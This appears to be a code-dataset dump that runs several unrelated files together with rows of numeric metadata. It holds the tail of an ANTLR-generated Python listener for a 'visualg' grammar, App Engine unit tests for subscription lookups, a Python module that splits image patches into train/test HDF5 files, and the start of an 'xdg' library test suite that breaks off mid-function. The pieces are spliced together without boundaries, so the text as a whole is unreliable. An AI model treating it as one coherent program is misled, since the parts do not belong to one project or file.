    def exitEscreva(self, ctx: visualgParser.EscrevaContext):
        """Exit a parse tree produced by visualgParser#escreva."""

    def enterLeia(self, ctx: visualgParser.LeiaContext):
        """Enter a parse tree produced by visualgParser#leia."""

    def exitLeia(self, ctx: visualgParser.LeiaContext):
        """Exit a parse tree produced by visualgParser#leia."""

    def enterDesvio_condicional(self, ctx: visualgParser.Desvio_condicionalContext):
        """Enter a parse tree produced by visualgParser#desvio_condicional."""

    def exitDesvio_condicional(self, ctx: visualgParser.Desvio_condicionalContext):
        """Exit a parse tree produced by visualgParser#desvio_condicional."""

    def enterSelecao_multipla(self, ctx: visualgParser.Selecao_multiplaContext):
        """Enter a parse tree produced by visualgParser#selecao_multipla."""

    def exitSelecao_multipla(self, ctx: visualgParser.Selecao_multiplaContext):
        """Exit a parse tree produced by visualgParser#selecao_multipla."""

    def enterPara_faca(self, ctx: visualgParser.Para_facaContext):
        """Enter a parse tree produced by visualgParser#para_faca."""

    def exitPara_faca(self, ctx: visualgParser.Para_facaContext):
        """Exit a parse tree produced by visualgParser#para_faca."""

    def enterEnquanto_faca(self, ctx: visualgParser.Enquanto_facaContext):
        """Enter a parse tree produced by visualgParser#enquanto_faca."""

    def exitEnquanto_faca(self, ctx: visualgParser.Enquanto_facaContext):
        """Exit a parse tree produced by visualgParser#enquanto_faca."""

    def enterRepita_ate(self, ctx: visualgParser.Repita_ateContext):
        """Enter a parse tree produced by visualgParser#repita_ate."""

    def exitRepita_ate(self, ctx: visualgParser.Repita_ateContext):
        """Exit a parse tree produced by visualgParser#repita_ate."""

    def enterAleatorio(self, ctx: visualgParser.AleatorioContext):
        """Enter a parse tree produced by visualgParser#aleatorio."""

    def exitAleatorio(self, ctx: visualgParser.AleatorioContext):
        """Exit a parse tree produced by visualgParser#aleatorio."""

    def enterArquivo(self, ctx: visualgParser.ArquivoContext):
        """Enter a parse tree produced by visualgParser#arquivo."""

    def exitArquivo(self, ctx: visualgParser.ArquivoContext):
        """Exit a parse tree produced by visualgParser#arquivo."""

    def enterTimer(self, ctx: visualgParser.TimerContext):
        """Enter a parse tree produced by visualgParser#timer."""

    def exitTimer(self, ctx: visualgParser.TimerContext):
        """Exit a parse tree produced by visualgParser#timer."""

    def enterLista_de_variaveis(self, ctx: visualgParser.Lista_de_variaveisContext):
        """Enter a parse tree produced by visualgParser#lista_de_variaveis."""

    def exitLista_de_variaveis(self, ctx: visualgParser.Lista_de_variaveisContext):
        """Exit a parse tree produced by visualgParser#lista_de_variaveis."""

    def enterLista_numeros(self, ctx: visualgParser.Lista_numerosContext):
        """Enter a parse tree produced by visualgParser#lista_numeros."""

    def exitLista_numeros(self, ctx: visualgParser.Lista_numerosContext):
        """Exit a parse tree produced by visualgParser#lista_numeros."""

    def enterLista_de_intervalo(self, ctx: visualgParser.Lista_de_intervaloContext):
        """Enter a parse tree produced by visualgParser#lista_de_intervalo."""

    def exitLista_de_intervalo(self, ctx: visualgParser.Lista_de_intervaloContext):
        """Exit a parse tree produced by visualgParser#lista_de_intervalo."""

    def enterTipo_da_variavel(self, ctx: visualgParser.Tipo_da_variavelContext):
        """Enter a parse tree produced by visualgParser#tipo_da_variavel."""

    def exitTipo_da_variavel(self, ctx: visualgParser.Tipo_da_variavelContext):
        """Exit a parse tree produced by visualgParser#tipo_da_variavel."""

    def enterTipo_vetor(self, ctx: visualgParser.Tipo_vetorContext):
        """Enter a parse tree produced by visualgParser#tipo_vetor."""

    def exitTipo_vetor(self, ctx: visualgParser.Tipo_vetorContext):
        """Exit a parse tree produced by visualgParser#tipo_vetor."""

    def enterIntervalo(self, ctx: visualgParser.IntervaloContext):
        """Enter a parse tree produced by visualgParser#intervalo."""

    def exitIntervalo(self, ctx: visualgParser.IntervaloContext):
        """Exit a parse tree produced by visualgParser#intervalo."""

    def enterPrint_variavel(self, ctx: visualgParser.Print_variavelContext):
        """Enter a parse tree produced by visualgParser#print_variavel."""

    def exitPrint_variavel(self, ctx: visualgParser.Print_variavelContext):
        """Exit a parse tree produced by visualgParser#print_variavel."""

    def enterCalculo(self, ctx: visualgParser.CalculoContext):
        """Enter a parse tree produced by visualgParser#calculo."""

    def exitCalculo(self, ctx: visualgParser.CalculoContext):
        """Exit a parse tree produced by visualgParser#calculo."""

    def enterExpressao_aritmetica(self, ctx: visualgParser.Expressao_aritmeticaContext):
        """Enter a parse tree produced by visualgParser#expressao_aritmetica."""

    def exitExpressao_aritmetica(self, ctx: visualgParser.Expressao_aritmeticaContext):
        """Exit a parse tree produced by visualgParser#expressao_aritmetica."""

    def enterExpressao_logica(self, ctx: visualgParser.Expressao_logicaContext):
        """Enter a parse tree produced by visualgParser#expressao_logica."""

    def exitExpressao_logica(self, ctx: visualgParser.Expressao_logicaContext):
        """Exit a parse tree produced by visualgParser#expressao_logica."""

    def enterSelecao_aritmetica(self, ctx: visualgParser.Selecao_aritmeticaContext):
        """Enter a parse tree produced by visualgParser#selecao_aritmetica."""

    def exitSelecao_aritmetica(self, ctx: visualgParser.Selecao_aritmeticaContext):
        """Exit a parse tree produced by visualgParser#selecao_aritmetica."""

    def enterSelecao_logica(self, ctx: visualgParser.Selecao_logicaContext):
        """Enter a parse tree produced by visualgParser#selecao_logica."""

    def exitSelecao_logica(self, ctx: visualgParser.Selecao_logicaContext):
        """Exit a parse tree produced by visualgParser#selecao_logica."""

    def enterSelecao_escolha(self, ctx: visualgParser.Selecao_escolhaContext):
        """Enter a parse tree produced by visualgParser#selecao_escolha."""

    def exitSelecao_escolha(self, ctx: visualgParser.Selecao_escolhaContext):
        """Exit a parse tree produced by visualgParser#selecao_escolha."""

    def enterIncremento(self, ctx: visualgParser.IncrementoContext):
        """Enter a parse tree produced by visualgParser#incremento."""

    def exitIncremento(self, ctx: visualgParser.IncrementoContext):
        """Exit a parse tree produced by visualgParser#incremento."""
# Drop the parser symbol from the module namespace (generated-code cleanup).
del visualgParser
| 33.235474
| 87
| 0.745307
| 1,229
| 10,868
| 6.47681
| 0.134255
| 0.053518
| 0.089196
| 0.160553
| 0.866583
| 0.728141
| 0.723995
| 0.557789
| 0.350628
| 0.058543
| 0
| 0.000572
| 0.195252
| 10,868
| 327
| 88
| 33.235474
| 0.909559
| 0.381119
| 0
| 0.47619
| 1
| 0
| 0.000152
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.47619
| false
| 0.47619
| 0.020408
| 0
| 0.503401
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
8cc251eae9758bb9e77bc9cd4d1a03aed219a327
| 9,623
|
py
|
Python
|
tests/models_tests/test_subscription.py
|
tervay/the-blue-alliance
|
e14c15cb04b455f90a2fcfdf4c1cdbf8454e17f8
|
[
"MIT"
] | 1
|
2016-03-19T20:29:35.000Z
|
2016-03-19T20:29:35.000Z
|
tests/models_tests/test_subscription.py
|
gregmarra/the-blue-alliance
|
5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | 11
|
2020-10-10T03:05:29.000Z
|
2022-02-27T09:57:22.000Z
|
tests/models_tests/test_subscription.py
|
gregmarra/the-blue-alliance
|
5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | null | null | null |
import unittest2
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from consts.model_type import ModelType
from consts.notification_type import NotificationType
from models.account import Account
from models.event import Event
from models.match import Match
from models.team import Team
from models.subscription import Subscription
class TestSubscription(unittest2.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_memcache_stub()
ndb.get_context().clear_cache() # Prevent data from leaking between tests
self.event = Event(
id='2020miket',
event_short='miket',
year=2020
)
self.team = Team(
id='frc7332',
team_number=7332
)
self.match = Match(
id='2020miket_qm1',
event=self.event.key,
comp_level='qm',
set_number=1,
match_number=1
)
def tearDown(self):
self.testbed.deactivate()
def test_users_subscribed_to_event_year(self):
# Make sure we match year*
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.MATCH_SCORE]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_event_key(self):
# Make sure we match an event key
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020mike2',
model_type=ModelType.EVENT,
notification_types=[NotificationType.MATCH_SCORE]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_event_year_key(self):
# Make sure we fetch both key and year together
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_1', 'user_id_2'])
def test_users_subscribed_to_event_model_type(self):
# Make sure we filter for model types
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertItemsEqual(users, ['user_id_1'])
def test_users_subscribed_to_event_unique(self):
# Make sure we filter for duplicates
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020miket',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='2020*',
model_type=ModelType.EVENT,
notification_types=[NotificationType.UPCOMING_MATCH]
).put()
users = Subscription.users_subscribed_to_event(self.event, NotificationType.UPCOMING_MATCH)
self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_team_key(self):
    """Every user subscribed to the team key should be returned."""
    for user_id in ('user_id_1', 'user_id_2'):
        Subscription(
            parent=ndb.Key(Account, user_id),
            user_id=user_id,
            model_key='frc7332',
            model_type=ModelType.TEAM,
            notification_types=[NotificationType.UPCOMING_MATCH]
        ).put()
    users = Subscription.users_subscribed_to_team(self.team, NotificationType.UPCOMING_MATCH)
    self.assertItemsEqual(users, ['user_id_1', 'user_id_2'])

def test_users_subscribed_to_team_model_type(self):
    """Subscriptions with a non-TEAM model type must be filtered out."""
    fixtures = [
        ('user_id_1', '2020miket', ModelType.EVENT),
        ('user_id_2', 'frc7332', ModelType.TEAM),
    ]
    for user_id, model_key, model_type in fixtures:
        Subscription(
            parent=ndb.Key(Account, user_id),
            user_id=user_id,
            model_key=model_key,
            model_type=model_type,
            notification_types=[NotificationType.UPCOMING_MATCH]
        ).put()
    users = Subscription.users_subscribed_to_team(self.team, NotificationType.UPCOMING_MATCH)
    self.assertItemsEqual(users, ['user_id_2'])

def test_users_subscribed_to_team_unique(self):
    """Duplicate subscriptions by the same user collapse to a single entry."""
    for _ in range(2):
        Subscription(
            parent=ndb.Key(Account, 'user_id_1'),
            user_id='user_id_1',
            model_key='frc7332',
            model_type=ModelType.TEAM,
            notification_types=[NotificationType.UPCOMING_MATCH]
        ).put()
    users = Subscription.users_subscribed_to_team(self.team, NotificationType.UPCOMING_MATCH)
    self.assertEqual(users, ['user_id_1'])
def test_users_subscribed_to_match_key(self):
    """Every user subscribed to the match key should be returned."""
    for user_id in ('user_id_1', 'user_id_2'):
        Subscription(
            parent=ndb.Key(Account, user_id),
            user_id=user_id,
            model_key='2020miket_qm1',
            model_type=ModelType.MATCH,
            notification_types=[NotificationType.UPCOMING_MATCH]
        ).put()
    users = Subscription.users_subscribed_to_match(self.match, NotificationType.UPCOMING_MATCH)
    self.assertItemsEqual(users, ['user_id_1', 'user_id_2'])

def test_users_subscribed_to_match_model_type(self):
    """Only MATCH-typed subscriptions count, even when the key text matches."""
    fixtures = [
        ('user_id_1', ModelType.MATCH),
        ('user_id_2', ModelType.EVENT),
    ]
    for user_id, model_type in fixtures:
        Subscription(
            parent=ndb.Key(Account, user_id),
            user_id=user_id,
            model_key='2020miket_qm1',
            model_type=model_type,
            notification_types=[NotificationType.UPCOMING_MATCH]
        ).put()
    users = Subscription.users_subscribed_to_match(self.match, NotificationType.UPCOMING_MATCH)
    self.assertItemsEqual(users, ['user_id_1'])

def test_users_subscribed_to_match_unique(self):
    """Duplicate subscriptions by the same user collapse to a single entry."""
    for _ in range(2):
        Subscription(
            parent=ndb.Key(Account, 'user_id_1'),
            user_id='user_id_1',
            model_key='2020miket_qm1',
            model_type=ModelType.MATCH,
            notification_types=[NotificationType.UPCOMING_MATCH]
        ).put()
    users = Subscription.users_subscribed_to_match(self.match, NotificationType.UPCOMING_MATCH)
    self.assertEqual(users, ['user_id_1'])
| 37.589844
| 99
| 0.627039
| 1,070
| 9,623
| 5.31215
| 0.080374
| 0.084448
| 0.046798
| 0.092892
| 0.874384
| 0.858198
| 0.851865
| 0.837262
| 0.837262
| 0.82741
| 0
| 0.025707
| 0.276421
| 9,623
| 255
| 100
| 37.737255
| 0.790608
| 0.04323
| 0
| 0.783784
| 0
| 0
| 0.081792
| 0
| 0
| 0
| 0
| 0
| 0.04955
| 1
| 0.058559
| false
| 0
| 0.045045
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cf8f9a9e98dfe2a32bdba1b79bfa8a0067e96ee
| 12,709
|
py
|
Python
|
GUI/PyQt/DLart/DatasetSplit.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 22
|
2018-04-27T21:28:46.000Z
|
2021-12-24T06:44:55.000Z
|
GUI/PyQt/DLart/DatasetSplit.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 81
|
2017-11-09T17:23:15.000Z
|
2020-01-28T22:54:13.000Z
|
GUI/PyQt/DLart/DatasetSplit.py
|
thomaskuestner/CNNArt
|
c2fc639dd2ce035f6ca90113290682a0ccd26fb8
|
[
"Apache-2.0"
] | 18
|
2017-11-13T16:12:17.000Z
|
2020-08-27T10:17:34.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 02 15:59:36 2017
@author: Sebastian Milde
"""
import math
import numpy as np
import h5py
from sklearn.model_selection import KFold
import os
def fSplitDataset(resultFolder, proband_list, model_list, allPatches, allY, sSplitting, patchSize, patchOverlap, split_ratio):
    """Split 2-D image patches into train/test sets and persist them as HDF5.

    Parameters
    ----------
    resultFolder : str
        Base output directory; paths are built by string concatenation, so
        it should end with a path separator.
    proband_list, model_list : sequence
        Metadata stored in each output file for reproducibility.
    allPatches : np.ndarray
        Patch array, (N, H, W) or (H, W, N); the latter is transposed to
        samples-first.
    allY : np.ndarray
        One label per patch.
    sSplitting : str
        Strategy: "normal_rand", "normal", "crossvalidation_data" or
        "crossvalidation_patient".
    patchSize : sequence
        (H, W) of a patch; also embedded in the output file names.
    patchOverlap : float
        Patch overlap, stored for reproducibility.
    split_ratio : float
        Fraction of samples assigned to the test set.
    """
    def _dump(path, X_train, X_test, y_train, y_test, indices=None):
        # Persist one split. `indices` optionally maps extra dataset names
        # (e.g. 'test_index') to index arrays, written in insertion order.
        with h5py.File(path, 'w') as hf:
            hf.create_dataset('X_train', data=X_train)
            hf.create_dataset('X_test', data=X_test)
            hf.create_dataset('y_train', data=y_train)
            hf.create_dataset('y_test', data=y_test)
            hf.create_dataset('patchSize', data=patchSize)
            hf.create_dataset('patchOverlap', data=patchOverlap)
            for name, value in (indices or {}).items():
                hf.create_dataset(name, data=value)
            hf.create_dataset('proband_list', data=proband_list)
            hf.create_dataset('model_list', data=model_list)

    # Normalize to samples-first layout (N, H, W).
    if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
        allPatches = np.transpose(allPatches, (2, 0, 1))
    if sSplitting == "normal_rand":
        # Random split: a split_ratio-sized slice of a permutation is the test set.
        nPatches = allPatches.shape[0]
        dVal = math.floor(split_ratio * nPatches)
        rand_num = np.random.permutation(np.arange(nPatches))
        rand_num_test = rand_num[0:int(dVal)].astype(int)
        rand_num_train = rand_num[int(dVal):nPatches].astype(int)
        X_test = allPatches[rand_num_test, :, :]
        y_test = allY[rand_num_test]
        X_train = np.delete(allPatches, rand_num_test, axis=0)
        y_train = np.delete(allY, rand_num_test)
        folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
        os.makedirs(folder, exist_ok=True)
        Path = folder + '/Becken10_normal_data' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
        print(Path)
        _dump(Path, X_train, X_test, y_train, y_test,
              {'test_index': rand_num_test, 'train_index': rand_num_train})
    elif sSplitting == "normal":
        # Deterministic split: the leading samples form the test set.
        nPatches = allPatches.shape[0]
        print(allPatches.shape)
        # BUG FIX: the test-set size was hard-coded to 18720 (debug
        # leftover), silently ignoring the split_ratio argument.
        dVal = math.floor(split_ratio * nPatches)
        num_ind = np.arange(nPatches)
        num_ind_test = num_ind[0:int(dVal)].astype(int)
        num_ind_train = num_ind[int(dVal):nPatches].astype(int)
        X_test = allPatches[num_ind_test, :, :]
        y_test = allY[num_ind_test]
        X_train = np.delete(allPatches, num_ind_test, axis=0)
        y_train = np.delete(allY, num_ind_test)
        folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
        os.makedirs(folder, exist_ok=True)
        Path = resultFolder + 'normal/AllData_Move_05_label05_val_ab' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
        print(Path)
        _dump(Path, X_train, X_test, y_train, y_test,
              {'test_index': num_ind_test, 'train_index': num_ind_train})
    elif sSplitting == "crossvalidation_data":
        kf = KFold(n_splits=15)
        folder = resultFolder + 'crossvalidation_data/' + str(patchSize[0]) + str(patchSize[1])
        # BUG FIX: os.makedirs(folder) ran inside the fold loop without a
        # guard and raised FileExistsError from the second fold onward.
        os.makedirs(folder, exist_ok=True)
        for ind_split, (train_index, test_index) in enumerate(kf.split(allPatches)):
            X_train, X_test = allPatches[train_index], allPatches[test_index]
            y_train, y_test = allY[train_index], allY[test_index]
            print(X_train.shape, X_test.shape)
            print(y_train.shape, y_test.shape)
            Path = folder + '/crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
            _dump(Path, X_train, X_test, y_train, y_test,
                  {'test_index': test_index, 'train_index': train_index})
    elif sSplitting == "crossvalidation_patient":
        # NOTE(review): despite the name this splits by sample rows exactly
        # like "crossvalidation_data", not by patient — confirm intent.
        kf = KFold(n_splits=15)
        folder = resultFolder + 'crossvalidation_patient/' + str(patchSize[0]) + str(patchSize[1])
        os.makedirs(folder, exist_ok=True)  # BUG FIX: was re-created per fold
        for ind_split, (train_index, test_index) in enumerate(kf.split(allPatches)):
            X_train, X_test = allPatches[train_index], allPatches[test_index]
            y_train, y_test = allY[train_index], allY[test_index]
            print(X_train.shape, X_test.shape)
            print(y_train.shape, y_test.shape)
            Path = folder + '/crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
            _dump(Path, X_train, X_test, y_train, y_test)
def fSplitDataset3D(resultFolder, proband_list, model_list, allPatches, allY, sSplitting, patchSize, patchOverlap, split_ratio):
    """Split 3-D image patches into train/test sets and persist them as HDF5.

    Same contract as fSplitDataset, but patches carry an extra depth axis:
    allPatches is (N, H, W, D) or (H, W, D, N); the latter is transposed to
    samples-first. See fSplitDataset for parameter details.
    """
    def _dump(path, X_train, X_test, y_train, y_test, indices=None):
        # Persist one split. `indices` optionally maps extra dataset names
        # (e.g. 'rand_num_test') to index arrays, written in insertion order.
        with h5py.File(path, 'w') as hf:
            hf.create_dataset('X_train', data=X_train)
            hf.create_dataset('X_test', data=X_test)
            hf.create_dataset('y_train', data=y_train)
            hf.create_dataset('y_test', data=y_test)
            hf.create_dataset('patchSize', data=patchSize)
            hf.create_dataset('patchOverlap', data=patchOverlap)
            for name, value in (indices or {}).items():
                hf.create_dataset(name, data=value)
            hf.create_dataset('proband_list', data=proband_list)
            hf.create_dataset('model_list', data=model_list)

    # Normalize to samples-first layout (N, H, W, D).
    if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
        allPatches = np.transpose(allPatches, (3, 0, 1, 2))
    if sSplitting == "normal_rand":
        # Random split: a split_ratio-sized slice of a permutation is the test set.
        nPatches = allPatches.shape[0]
        dVal = math.floor(split_ratio * nPatches)
        rand_num = np.random.permutation(np.arange(nPatches))
        rand_num_test = rand_num[0:int(dVal)].astype(int)
        rand_num_train = rand_num[int(dVal):nPatches].astype(int)
        X_test = allPatches[rand_num_test, :, :, :]
        y_test = allY[rand_num_test]
        X_train = np.delete(allPatches, rand_num_test, axis=0)
        y_train = np.delete(allY, rand_num_test)
        folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
        os.makedirs(folder, exist_ok=True)
        Path = folder + '/normal_data' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
        print(Path)
        _dump(Path, X_train, X_test, y_train, y_test,
              {'rand_num_test': rand_num_test, 'rand_num_train': rand_num_train})
    elif sSplitting == "normal":
        # Deterministic split: the leading samples form the test set.
        nPatches = allPatches.shape[0]
        print(allPatches.shape)
        # BUG FIX: the test-set size was hard-coded to 1980 (debug
        # leftover), silently ignoring the split_ratio argument.
        dVal = math.floor(split_ratio * nPatches)
        num_ind = np.arange(nPatches)
        num_ind_test = num_ind[0:int(dVal)].astype(int)
        num_ind_train = num_ind[int(dVal):nPatches].astype(int)
        X_test = allPatches[num_ind_test, :, :, :]
        y_test = allY[num_ind_test]
        X_train = np.delete(allPatches, num_ind_test, axis=0)
        y_train = np.delete(allY, num_ind_test)
        folder = resultFolder + 'normal/' + str(patchSize[0]) + str(patchSize[1])
        os.makedirs(folder, exist_ok=True)
        Path = resultFolder + 'normal_3D/Beckent2_Move_05_label05_val_ab_test_ma_' + str(patchSize[0]) + str(patchSize[1]) + '3D.h5'
        # BUG FIX: the file lives under 'normal_3D/', which was never
        # created — h5py would fail on a fresh resultFolder.
        os.makedirs(os.path.dirname(Path), exist_ok=True)
        print(Path)
        _dump(Path, X_train, X_test, y_train, y_test,
              {'test_index': num_ind_test, 'train_index': num_ind_train})
    elif sSplitting == "crossvalidation_data":
        kf = KFold(n_splits=15)
        folder = resultFolder + 'crossvalidation_data/' + str(patchSize[0]) + str(patchSize[1])
        os.makedirs(folder, exist_ok=True)
        for ind_split, (train_index, test_index) in enumerate(kf.split(allPatches)):
            print("TRAIN:", train_index, "TEST:", test_index)
            X_train, X_test = allPatches[train_index], allPatches[test_index]
            y_train, y_test = allY[train_index], allY[test_index]
            print(X_train.shape, X_test.shape)
            print(y_train.shape, y_test.shape)
            Path = folder + '/crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
            _dump(Path, X_train, X_test, y_train, y_test)
    elif sSplitting == "crossvalidation_patient":
        # NOTE(review): despite the name this splits by sample rows exactly
        # like "crossvalidation_data", not by patient — confirm intent.
        kf = KFold(n_splits=15)
        folder = resultFolder + 'crossvalidation_patient/' + str(patchSize[0]) + str(patchSize[1])
        # BUG FIX: os.makedirs(folder) ran inside the fold loop without a
        # guard and raised FileExistsError from the second fold onward.
        os.makedirs(folder, exist_ok=True)
        for ind_split, (train_index, test_index) in enumerate(kf.split(allPatches)):
            X_train, X_test = allPatches[train_index], allPatches[test_index]
            y_train, y_test = allY[train_index], allY[test_index]
            print(X_train.shape, X_test.shape)
            print(y_train.shape, y_test.shape)
            Path = folder + '/crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
            _dump(Path, X_train, X_test, y_train, y_test)
| 49.644531
| 188
| 0.604217
| 1,593
| 12,709
| 4.558067
| 0.065286
| 0.081531
| 0.152872
| 0.048478
| 0.965983
| 0.958683
| 0.951109
| 0.942019
| 0.942019
| 0.942019
| 0
| 0.015166
| 0.273664
| 12,709
| 256
| 189
| 49.644531
| 0.771422
| 0.015894
| 0
| 0.875556
| 0
| 0
| 0.100474
| 0.027283
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008889
| false
| 0.022222
| 0.022222
| 0
| 0.031111
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50bb0804cb24987ebc55bfdb44634e0d62165982
| 7,784
|
py
|
Python
|
test/test_xdg.py
|
rondou/xdg
|
d94dad50535de861e6987bf918be08f96317d2d7
|
[
"0BSD"
] | 70
|
2017-03-29T05:26:05.000Z
|
2022-02-04T22:22:42.000Z
|
test/test_xdg.py
|
rondou/xdg
|
d94dad50535de861e6987bf918be08f96317d2d7
|
[
"0BSD"
] | 65
|
2017-03-29T17:05:23.000Z
|
2022-03-01T23:04:56.000Z
|
test/test_xdg.py
|
rondou/xdg
|
d94dad50535de861e6987bf918be08f96317d2d7
|
[
"0BSD"
] | 12
|
2017-06-23T16:15:11.000Z
|
2021-07-20T11:56:00.000Z
|
"""Test suite for xdg."""
import os
from pathlib import Path
from _pytest.monkeypatch import MonkeyPatch
import xdg
HOME_DIR = Path("/homedir")
def test_xdg_cache_home_unset(monkeypatch: MonkeyPatch) -> None:
    """An unset XDG_CACHE_HOME falls back to $HOME/.cache."""
    monkeypatch.setenv("HOME", str(HOME_DIR))
    monkeypatch.delenv("XDG_CACHE_HOME", raising=False)
    assert xdg.xdg_cache_home() == HOME_DIR / ".cache"

def test_xdg_cache_home_empty(monkeypatch: MonkeyPatch) -> None:
    """An empty XDG_CACHE_HOME behaves as if it were unset."""
    monkeypatch.setenv("XDG_CACHE_HOME", "")
    monkeypatch.setenv("HOME", str(HOME_DIR))
    assert xdg.xdg_cache_home() == HOME_DIR / ".cache"

def test_xdg_cache_home_relative(monkeypatch: MonkeyPatch) -> None:
    """A relative XDG_CACHE_HOME is ignored in favour of the default."""
    monkeypatch.setenv("XDG_CACHE_HOME", "rela/tive")
    monkeypatch.setenv("HOME", str(HOME_DIR))
    assert xdg.xdg_cache_home() == HOME_DIR / ".cache"

def test_xdg_cache_home_absolute(monkeypatch: MonkeyPatch) -> None:
    """An absolute XDG_CACHE_HOME is honoured verbatim."""
    monkeypatch.setenv("XDG_CACHE_HOME", "/xdg_cache_home")
    assert xdg.xdg_cache_home() == Path("/xdg_cache_home")
def test_xdg_config_dirs_unset(monkeypatch: MonkeyPatch) -> None:
    """An unset XDG_CONFIG_DIRS yields the spec default /etc/xdg."""
    monkeypatch.delenv("XDG_CONFIG_DIRS", raising=False)
    expected = [Path("/etc/xdg")]
    assert xdg.xdg_config_dirs() == expected

def test_xdg_config_dirs_empty(monkeypatch: MonkeyPatch) -> None:
    """An empty XDG_CONFIG_DIRS behaves as if it were unset."""
    monkeypatch.setenv("XDG_CONFIG_DIRS", "")
    expected = [Path("/etc/xdg")]
    assert xdg.xdg_config_dirs() == expected

def test_xdg_config_dirs_relative(monkeypatch: MonkeyPatch) -> None:
    """Relative entries in XDG_CONFIG_DIRS are discarded, leaving the default."""
    monkeypatch.setenv("XDG_CONFIG_DIRS", "rela/tive:ano/ther")
    expected = [Path("/etc/xdg")]
    assert xdg.xdg_config_dirs() == expected

def test_xdg_config_dirs_set(monkeypatch: MonkeyPatch) -> None:
    """Absolute entries are kept in order; relative ones are dropped."""
    monkeypatch.setenv("XDG_CONFIG_DIRS", "/first:rela/tive:/sec/ond")
    expected = [Path("/first"), Path("/sec/ond")]
    assert xdg.xdg_config_dirs() == expected
def test_xdg_config_home_unset(monkeypatch: MonkeyPatch) -> None:
    """An unset XDG_CONFIG_HOME falls back to $HOME/.config."""
    monkeypatch.setenv("HOME", str(HOME_DIR))
    monkeypatch.delenv("XDG_CONFIG_HOME", raising=False)
    assert xdg.xdg_config_home() == HOME_DIR / ".config"

def test_xdg_config_home_empty(monkeypatch: MonkeyPatch) -> None:
    """An empty XDG_CONFIG_HOME behaves as if it were unset."""
    monkeypatch.setenv("XDG_CONFIG_HOME", "")
    monkeypatch.setenv("HOME", str(HOME_DIR))
